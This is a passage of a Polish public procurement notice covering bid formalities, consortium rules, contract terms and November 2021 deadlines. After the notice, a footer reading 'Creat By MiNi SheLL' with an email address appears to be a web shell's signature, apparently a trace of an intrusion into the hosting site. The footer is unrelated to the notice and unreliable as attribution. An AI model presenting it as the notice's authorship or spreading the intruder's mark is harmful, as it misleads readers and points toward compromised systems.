w postępowaniu. Oferta oraz oświadczenie o niepodleganiu wykluczeniu oraz<br/>spełnianiu warunków udziału w postępowaniu muszą być złożone w oryginale. To samo dotyczy<br/>oświadczenia Wykonawcy o tym, że zachodzą wobec niego podstawy wykluczenia z<br/>postępowania na podstawie art. 108 ust. 1 pkt. 1, 2 ,5 ustawy Pzp (załącznik nr 4 – o ile<br/>dotyczy).<br/>3. Gdy umocowanie osoby składającej ofertę nie wynika z dokumentów rejestrowych,<br/>Wykonawca, który składa ofertę za<br/>pośrednictwem pełnomocnika, powinien dołączyć do oferty dokument pełnomocnictwa<br/>obejmujący swym zakresem umocowanie do złożenia oferty lub do złożenia oferty i podpisania<br/>umowy. W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia<br/>Wykonawcy zobowiązani są do ustanowienia pełnomocnika. Pełnomocnictwo do złożenia oferty<br/>musi być złożone w oryginale w takiej samej formie, jak składana jest oferta (tj. w formie<br/>elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej<br/>opatrzonej podpisem zaufanym, lub podpisem osobistym). Dopuszcza się także złożenie<br/>elektronicznej kopii (skanu) pełnomocnictwa sporządzonego uprzednio w formie pisemnej, w<br/>formie elektronicznego poświadczenia sporządzonego stosownie do art. 97 par 2 ustawy z<br/>dnia14 lutego 1991 r. – Prawo o notariacie, które to poświadczenie notariusz opatruje<br/>kwalifikowanym podpisem elektronicznym, bądź też poprzez opatrzenie skanu pełnomocnictwa<br/>sporządzonego uprzednio w formie pisemnej kwalifikowanym podpisem, podpisem zaufanym<br/>lub podpisem osobistym mocodawcy. Elektroniczna kopia pełnomocnictwa nie może być<br/>uwierzytelniona przez upełnomocnionego. 4. Oświadczenie Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia – załącznik nr 7 do SWZ. 5. Zobowiązanie podmiotu<br/>trzeciego – załącznik nr 6 do SWZ (o ile dotyczy). Zobowiązanie musi być złożone w formie<br/>elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub w postaci<br/>elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym osoby upoważnionej do<br/>reprezentowania Wykonawców zgodnie z formą reprezentacji określoną w dokumencie<br/>rejestrowym właściwym dla formy organizacyjnej lub innym dokumencie. 6. W przypadku gdy<br/>Wykonawca powierza wykonanie części zamówienia podwykonawcy, zobowiązany jest do<br/>wykazania w załączniku nr 5 do SWZ informacji o części zamówienia, której wykonanie<br/>zamierza powierzyć podwykonawcom oraz podania nazw ich firm, o ile są już znane.<br/>7. Zastrzeżenie tajemnicy przedsiębiorstwa – W przypadku informacji objętych tajemnicą<br/>przedsiębiorstwa Wykonawca powinien w momencie ich przekazania wyraźnie oznaczyć, które<br/>informacje stanowią tajemnicę przedsiębiorstwa oraz nie powinny być udostępniane. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> a) Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do<br/>reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego; b) Wszelka korespondencja<br/>będzie prowadzona przez Zamawiającego wyłącznie z pełnomocnikiem; c) Do oferty należy<br/>załączyć<br/>pełnomocnictwo dla ustanowionego pełnomocnika; d) Wykonawcy składają jedną ofertę, do<br/>której załączone będą dokumenty, o których mowa w SWZ; e) Wykonawca winien przedłożyć<br/>dokumenty i oświadczenia wymienione w rozdziale II podrozdziale 9 SWZ dotyczące każdego<br/>partnera konsorcjum osobno w zakresie tam wskazanym ; f) Oświadczenia i dokumenty<br/>wspólne, takie jak np.: oferta cenowa, składa pełnomocnik Wykonawców w imieniu wszystkich;<br/>g) Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich<br/>Wykonawców występujących wspólnie; h) wszyscy partnerzy będą ponosić odpowiedzialność<br/>solidarną za wykonanie umowy zgodnie z jej postanowieniami; i) Wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców,<br/>którzy wykonają roboty budowlane, do realizacji których te zdolności są wymagane. Wtedy<br/>powinni dołączyć do oferty oświadczenie (załącznik nr 7 do SWZ), z którego wynika, które roboty<br/>budowlane wykonują poszczególni Wykonawcy, j) przed podpisaniem umowy Wykonawcy<br/>składający ofertę wspólną będą mieli obowiązek przedstawić Zamawiającemu umowę<br/>konsorcjum. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający dopuszcza możliwość zmiany umowy zawartej z Wykonawcą. Wszystkie<br/>dopuszczalne zmiany postanowień umowy oraz określenie rodzaju, zakresu i warunków zmian<br/>zawarte są we wzorze umowy (stanowiącym<br/>załącznik nr 12 do SWZ). <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-11-08 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Za pośrednictwem Platformy Zakupowej: https://dok.ezamawiajacy.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-11-08 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-12-07</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wykonawcy oraz innemu podmiotowi, jeżeli ma lub miał interes w uzyskaniu zamówienia oraz<br/>poniósł lub może ponieść szkodę w wyniku naruszenia przez Zamawiającego przepisów ustawy<br/>Pzp, przysługują środki ochrony prawnej określone w dziale IX ustawy Pzp.

Creat By MiNi SheLL
Email: jattceo@gmail.com